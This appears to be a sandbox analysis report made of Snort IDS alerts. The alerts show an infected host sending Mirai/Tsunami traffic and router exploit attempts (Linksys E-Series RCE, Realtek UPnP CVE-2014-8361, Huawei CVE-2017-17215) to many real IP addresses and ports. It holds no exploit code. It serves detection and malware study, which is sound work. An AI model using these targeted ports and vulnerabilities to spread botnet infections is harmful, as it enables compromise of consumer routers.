        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42204 -> 172.65.210.229:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60296 -> 95.232.143.204:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36862 -> 172.245.250.172:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53788 -> 156.225.158.38:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55186 -> 172.65.24.98:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47160 -> 172.65.46.10:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42906 -> 172.65.165.81:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33834 -> 95.101.184.232:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48368 -> 95.216.173.240:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56598 -> 95.216.15.130:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38802 -> 95.233.89.221:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58836 -> 95.213.204.39:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58676 -> 95.6.51.108:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37608 -> 156.247.19.198:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55310 -> 156.232.92.247:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47070 -> 156.240.107.73:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36172 -> 95.179.134.10:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46038 -> 95.130.28.148:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37380 -> 172.65.43.202:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60828 -> 172.65.47.232:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46212 -> 95.159.60.130:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48666 -> 95.238.139.13:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58606 -> 95.154.49.58:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40584 -> 95.120.26.121:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55784 -> 95.209.130.241:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44678 -> 95.159.26.35:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33824 -> 156.241.84.240:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51218 -> 156.250.28.84:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39454 -> 95.155.16.121:80
        Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56372 -> 197.214.98.180:37215
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45740 -> 95.42.196.180:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39434 -> 156.250.15.179:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33886 -> 172.65.108.141:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33430 -> 172.65.10.51:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54408 -> 172.65.128.1:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60614 -> 95.101.218.175:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40254 -> 95.156.55.124:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41260 -> 95.35.24.89:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34734 -> 172.245.60.199:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34088 -> 156.226.61.64:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51982 -> 41.182.106.161:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46206 -> 95.56.15.149:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44870 -> 172.65.114.91:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50106 -> 172.65.68.140:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45400 -> 156.235.96.90:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57512 -> 95.100.78.17:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46200 -> 95.100.203.40:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36554 -> 172.65.122.63:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57596 -> 172.65.239.201:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50844 -> 172.255.80.235:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36828 -> 156.241.77.219:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35774 -> 95.101.154.158:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38634 -> 95.101.185.50:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54382 -> 95.250.149.86:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41474 -> 172.65.182.213:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60094 -> 98.156.215.149:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39674 -> 172.65.169.109:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50038 -> 88.145.17.118:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49556 -> 172.65.48.149:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44422 -> 95.101.97.17:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56166 -> 95.65.7.172:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45474 -> 156.241.125.91:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57218 -> 88.147.125.11:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48664 -> 88.250.14.127:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43406 -> 156.250.7.208:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34130 -> 95.154.249.121:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57044 -> 88.247.218.183:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39922 -> 95.47.138.168:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50038 -> 95.155.229.234:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43008 -> 95.100.94.179:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37358 -> 156.224.24.201:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56414 -> 95.82.129.197:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60930 -> 95.57.72.0:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59286 -> 95.57.134.46:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51484 -> 88.203.246.62:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39748 -> 172.65.35.232:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55164 -> 172.65.207.172:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55800 -> 184.105.8.214:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45778 -> 95.209.147.143:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58398 -> 95.112.170.49:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58354 -> 95.255.117.238:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51048 -> 156.247.30.224:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56836 -> 156.241.123.157:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50424 -> 172.65.37.250:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51258 -> 156.235.102.246:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53412 -> 172.245.90.172:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48964 -> 95.97.138.226:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41456 -> 95.59.17.54:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36256 -> 95.15.240.180:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49420 -> 156.226.106.127:52869
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43308 -> 172.65.63.121:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43818 -> 88.166.177.101:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57790 -> 95.154.52.142:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60942 -> 95.0.30.56:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38118 -> 95.58.115.234:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39228 -> 95.159.31.91:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35424 -> 172.65.29.149:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38168 -> 95.61.201.124:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38206 -> 172.65.9.9:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34764 -> 88.250.111.144:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42786 -> 95.90.100.206:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47704 -> 95.239.27.78:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36330 -> 172.65.74.111:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46204 -> 172.65.219.168:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45400 -> 172.65.248.242:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48254 -> 88.221.77.45:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41686 -> 88.122.230.167:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35020 -> 95.56.57.119:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49930 -> 172.65.3.127:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33364 -> 172.65.231.2:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44432 -> 156.225.158.4:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54476 -> 88.208.78.179:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34814 -> 172.65.172.41:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59816 -> 172.65.128.245:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41258 -> 156.244.118.33:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33740 -> 156.244.70.102:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56690 -> 95.142.206.192:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55354 -> 95.86.72.58:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44138 -> 95.57.98.210:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58782 -> 172.65.32.101:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39632 -> 88.87.173.198:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53758 -> 88.249.225.18:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59336 -> 172.65.250.151:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52588 -> 172.245.25.106:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55294 -> 95.77.28.155:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39856 -> 88.221.178.118:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33534 -> 156.235.111.198:52869
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34840 -> 156.244.105.51:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43352 -> 95.100.59.120:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42972 -> 95.216.46.163:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47040 -> 95.217.167.134:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51290 -> 95.142.205.94:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38602 -> 95.101.211.181:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59854 -> 95.154.210.93:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38122 -> 95.140.158.28:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35902 -> 95.159.55.214:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48388 -> 95.58.3.15:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46232 -> 172.65.164.53:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52268 -> 95.97.118.83:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56756 -> 95.179.233.69:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35494 -> 95.179.190.99:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46304 -> 95.130.158.89:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49178 -> 95.100.1.58:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37560 -> 95.58.2.163:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60168 -> 172.65.232.204:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46560 -> 172.65.179.138:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60430 -> 95.211.199.200:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38966 -> 95.182.120.236:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48086 -> 95.110.175.27:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51672 -> 95.209.155.90:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44268 -> 95.144.20.161:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41954 -> 95.219.228.159:80
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58192 -> 156.226.101.148:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53290 -> 95.211.226.138:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41248 -> 95.216.160.193:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55816 -> 95.163.132.24:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34294 -> 95.153.16.93:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36174 -> 95.183.11.240:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50980 -> 95.164.218.195:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44254 -> 95.137.248.65:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:32904 -> 172.65.66.172:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60108 -> 95.101.128.236:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44722 -> 172.65.54.193:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49348 -> 172.247.6.58:55555
        Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35262 -> 156.244.117.67:52869
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52158 -> 95.101.96.51:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54070 -> 95.227.161.24:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38286 -> 95.241.182.147:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56464 -> 95.110.232.97:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33290 -> 95.100.154.141:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51454 -> 95.65.107.220:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46468 -> 95.101.178.89:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36174 -> 95.130.253.22:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34392 -> 95.128.47.63:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44728 -> 172.65.177.137:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60432 -> 172.65.246.123:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40476 -> 95.79.118.178:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41366 -> 95.214.217.51:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47994 -> 95.174.97.233:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54556 -> 95.59.176.82:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51132 -> 95.216.103.126:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41126 -> 95.217.58.159:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45052 -> 95.217.218.159:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50056 -> 95.140.152.231:80
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48080 -> 172.65.182.182:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37946 -> 172.65.85.107:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34854 -> 172.65.104.202:55555
        Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59202 -> 172.81.184.184:55555
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57846 -> 95.101.95.179:80
        Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33586 -> 95.168.221.107:80
